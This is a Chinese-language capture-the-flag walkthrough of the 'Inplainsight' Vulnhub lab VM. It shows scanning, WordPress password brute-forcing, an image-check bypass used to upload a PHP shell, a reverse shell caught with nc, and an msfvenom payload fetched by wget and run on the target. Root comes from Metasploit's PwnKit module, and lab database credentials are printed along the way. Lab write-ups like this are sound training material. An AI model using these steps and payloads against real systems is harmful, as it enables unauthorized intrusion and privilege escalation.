Inplainsight
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
192.168.56.100 08:00:27:86:38:75 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:f9:29:62 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 20:38 EDT
Nmap scan report for kb.final (192.168.56.254)
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 ftp ftp 306 Nov 22 2019 todo.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 392d3630aaac5d1601082c5fc56717b4 (RSA)
| 256 b021a7430c928570ff57c6f937dfe5a2 (ECDSA)
|_ 256 7399d582878c0abc3d1e8daab169aa35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:F9:29:62 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds
NMAP扫描结果表明目标主机有3个开放端口:21(ftp)、22(ssh)、80(http)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 IPS Corp
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||47934|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Nov 22 2019 .
drwxr-xr-x 2 ftp ftp 4096 Nov 22 2019 ..
-rw-r--r-- 1 ftp ftp 306 Nov 22 2019 todo.txt
226 Directory send OK.
ftp> get todo.txt
local: todo.txt remote: todo.txt
229 Entering Extended Passive Mode (|||24332|)
150 Opening BINARY mode data connection for todo.txt (306 bytes).
100% |********************************************************************************| 306 410.47 KiB/s 00:00 ETA
226 Transfer complete.
306 bytes received in 00:00 (260.98 KiB/s)
──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ cat todo.txt
mike - please get ride of that worthless wordpress instance! it's a security ris
k. if you have privilege issues, please ask joe for assitance.
joe - stop leaving backdoors on the system or your access will be removed! y
our rabiit holes aren't enough for these elite cyber hacking types.
- boss person
-
用户:mike, joe
-
可能有backdoor文件
-
目标站点是wordpress?
──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.254
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,js,html,txt,sh
[+] Timeout: 10s
===============================================================
2023/04/15 20:56:47 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10918]
/info.php (Status: 200) [Size: 84027]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.254/wordpress/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1319837 / 1323366 (99.73%)===============================================================
2023/04/15 20:59:29 Finished
==========================================================
Gobuster工具识别出目录/wordpress,访问该目录,发现页面显示不完整,查看页面源代码,可知需要添加主机名到/etc/hosts文件:inplainsight
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.254 inplainsight
──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ -e u,p
________________________________________________________
i] User(s) Identified:
[+] bossperson
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
wpscan工具识别出用户名bossperson,看是否可以破解出密码
──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ -U bossperson -P /usr/share/wordlists/rockyou.txt
运行了15分钟,仍然没有破解出密码,暂时放弃这个方向。
接下来看能否扫描出有漏洞的插件?
(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/wordpress/ --plugins-detection mixed
没有识别出有漏洞的插件。
回到默认页面,注意到:
This is the default welcome page used to test the correct operation of the Apache2 server after installation on Ubuntu systems. It is based on the equivalent page on Debian, from which the Ubuntu Apache packaging is derived. If you can read this page, it means that the Apache HTTP server installed at this site is working properly. You should replace this file (located at /var/www/html/index.htnl) before continuing to operate your HTTP server.
If you are a normal user of this web site and don't know what this page is about, this probably means that the site is currently unavailable due to maintenance. If the problem persists, please contact the site's administrator.
存在一个文件/var/www/html/index.htnl
扩展名很奇怪,访问该页面
里面有个动画图片,点击一下,就跳转到另一个页面,可以上传文件
但是当上传shell.php时,返回错误:File is not an image.
用burpsuite拦截请求,看能否通过修改application-type来绕过
在Burpsuite修改应用类型为image/jpeg,未能成功
挡在shell.php头部增加一行:GIF89a
此时返回:File is an image - image/gif.此时页面源代码有注释:
<!--c28tZGV2LXdvcmRwcmVzcw==-->
</body></html>
对其进行解码:
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ echo 'c28tZGV2LXdvcmRwcmVzcw==' | base64 -d
so-dev-wordpress
这应该是另外一个目录,这也就与todo文件中的描述对应起来,因此对该so-dev-wordpress进行扫描
──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -e u,p
[i] User(s) Identified:
[+] mike
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -U mike -P /usr/share/wordlists/rockyou.txt
运行了15分钟,没有破解出密码。
──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress --plugins-detection mixed
wpscan工具也没有扫描出有漏洞的插件。
那看能不能破解出另外一个用户admin的密码,在感觉没啥希望的时候,运行了5分钟以后得到了密码:
─(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ wpscan --url http://192.168.56.254/so-dev-wordpress -U admin -P /usr/share/wordlists/rockyou.txt
[!] Valid Combinations Found:
| Username: admin, Password: admin1
用admin:admin1登录以后才发现mike是普通用户,而admin是管理员,很多情况下wpscan工具扫描出的一个用户是管理员,但是本靶机并非这种情况
将shell.php替换theme editor中的404模板,然后访问4o4.php文件得到shell
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 54968
Linux inplainsight 5.3.0-23-generic #25-Ubuntu SMP Tue Nov 12 09:22:33 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
22:30:48 up 1:58, 0 users, load average: 0.03, 1.09, 1.87
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@inplainsight:/$ cd /home
cd /home
www-data@inplainsight:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Nov 21 2019 .
drwxr-xr-x 19 root root 4.0K Nov 21 2019 ..
drwxr-xr-x 4 joe joe 4.0K Nov 22 2019 joe
drwxr-xr-x 4 mike mike 4.0K Nov 22 2019 mike
www-data@inplainsight:/home$ cd joe
cd joe
www-data@inplainsight:/home/joe$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 joe joe 4.0K Nov 22 2019 .
drwxr-xr-x 4 root root 4.0K Nov 21 2019 ..
lrwxrwxrwx 1 root root 9 Nov 22 2019 .bash_history -> /dev/null
-rw-r--r-- 1 joe joe 220 May 5 2019 .bash_logout
-rw-r--r-- 1 joe joe 3.7K May 5 2019 .bashrc
drwx------ 2 joe joe 4.0K Nov 21 2019 .cache
drwx------ 3 joe joe 4.0K Nov 21 2019 .gnupg
-rw-r--r-- 1 joe joe 807 May 5 2019 .profile
-rw-rw---- 1 joe joe 76 Nov 22 2019 journal
www-data@inplainsight:/home/joe$ cd ..
cd ..
www-data@inplainsight:/home$ ls -lah
ls -lah
total 16K
drwxr-xr-x 4 root root 4.0K Nov 21 2019 .
drwxr-xr-x 19 root root 4.0K Nov 21 2019 ..
drwxr-xr-x 4 joe joe 4.0K Nov 22 2019 joe
drwxr-xr-x 4 mike mike 4.0K Nov 22 2019 mike
www-data@inplainsight:/home$ cd mike
cd mike
www-data@inplainsight:/home/mike$ ls -alh
ls -alh
total 28K
drwxr-xr-x 4 mike mike 4.0K Nov 22 2019 .
drwxr-xr-x 4 root root 4.0K Nov 21 2019 ..
lrwxrwxrwx 1 root root 9 Nov 22 2019 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike 220 Nov 21 2019 .bash_logout
-rw-r--r-- 1 mike mike 3.7K Nov 21 2019 .bashrc
drwx------ 2 mike mike 4.0K Nov 21 2019 .cache
drwx------ 3 mike mike 4.0K Nov 21 2019 .gnupg
-rw-r--r-- 1 mike mike 807 Nov 21 2019 .profile
提权
www-data@inplainsight:/var/www/html/so-dev-wordpress$ cat wp-config.php
cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'sodevwp' );
/** MySQL database username */
define( 'DB_USER', 'sodevwp' );
/** MySQL database password */
define( 'DB_PASSWORD', 'oZ2R3c2x7dLL6#hJ' );
接下里看能不能得到Meterpreter会话
┌──(kali㉿kali)-[~/Vulnhub/Inplainsight]
└─$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.206 LPORT=6666 -f elf -o escalate.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
将escalate.elf上传到目标主机/tmp目录,修改权限,并执行(同时在kali linux启动msfconsole)
ww-data@inplainsight:/tmp$ wget http://192.168.56.206:8000/escalate.elf
wget http://192.168.56.206:8000/escalate.elf
--2023-04-15 22:40:41-- http://192.168.56.206:8000/escalate.elf
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: ‘escalate.elf’
escalate.elf 100%[===================>] 207 --.-KB/s in 0s
2023-04-15 22:40:41 (80.0 MB/s) - ‘escalate.elf’ saved [207/207]
www-data@inplainsight:/tmp$ chmod +x escalate.elf
chmod +x escalate.elf
www-data@inplainsight:/tmp$ ./escalate.elf
./escalate.elf
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.206:6666
[*] Sending stage (1017704 bytes) to 192.168.56.254
[*] Meterpreter session 1 opened (192.168.56.206:6666 -> 192.168.56.254:50464) at 2023-04-15 22:40:54 -0400
运行Linux suggester寻找是否存在可以用于本地提权的漏洞
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.56.254 - Collecting local exploits for x86/linux...
[*] 192.168.56.254 - 181 exploit checks are being tried...
[+] 192.168.56.254 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.254 - exploit/linux/local/netfilter_priv_esc_ipv4: The target appears to be vulnerable.
[+] 192.168.56.254 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.254 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 56 / 56
[*] 192.168.56.254 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
2 exploit/linux/local/netfilter_priv_esc_ipv4 Yes The target appears to be vulnerable.
3 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.56.206:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.sfhgqnd
[+] The target is vulnerable.
[*] Writing '/tmp/.dmjtawxsqqdj/gfrhamboy/gfrhamboy.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.dmjtawxsqqdj
[*] Sending stage (3045348 bytes) to 192.168.56.254
[+] Deleted /tmp/.dmjtawxsqqdj/gfrhamboy/gfrhamboy.so
[+] Deleted /tmp/.dmjtawxsqqdj/.eorecnkoiqu
[+] Deleted /tmp/.dmjtawxsqqdj
[*] Meterpreter session 2 opened (192.168.56.206:8888 -> 192.168.56.254:52522) at 2023-04-15 22:45:20 -0400
meterpreter > shell
Process 2293 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 48K
drwx------ 5 root root 4.0K Dec 2 2019 .
drwxr-xr-x 19 root root 4.0K Nov 21 2019 ..
lrwxrwxrwx 1 root root 9 Nov 22 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Aug 27 2019 .bashrc
drwx------ 2 root root 4.0K Nov 21 2019 .cache
drwx------ 3 root root 4.0K Nov 21 2019 .gnupg
-rw------- 1 root root 472 Nov 21 2019 .mysql_history
-rw-r--r-- 1 root root 148 Aug 27 2019 .profile
drwxr-xr-x 2 root root 4.0K Nov 22 2019 .vim
-rw------- 1 root root 11K Dec 2 2019 .viminfo
-rw-r--r-- 1 root root 408 Nov 22 2019 flag.txt
cat flag.txt
__
____ ____ ____ ________________ _/ |_ ______
_/ ___\/ _ \ / \ / ___\_ __ \__ \\ __\/ ___/
\ \__( <_> ) | \/ /_/ > | \// __ \| | \___ \
\___ >____/|___| /\___ /|__| (____ /__| /____ >
\/ \//_____/ \/ \/
easy right? thanks for playing.
feel free to leave feedback with me @bzyo_
成功提权并得到root flag
经验教训
-
在破解so-dev-wp的wordpress站点用户密码时,按照以往的规律,被wpscan工具识别的第一个用户是管理员,因此就重点破解第一个用户名的密码mike,好在在破解第2个用户admin时,没有花费太长时间就破解出密码。
-
本靶机的第一个突破点是,默认页面中有个不寻常的文件名,然后访问你该文件时,需要注意点击一下图片,否则会错过整个渗透的机会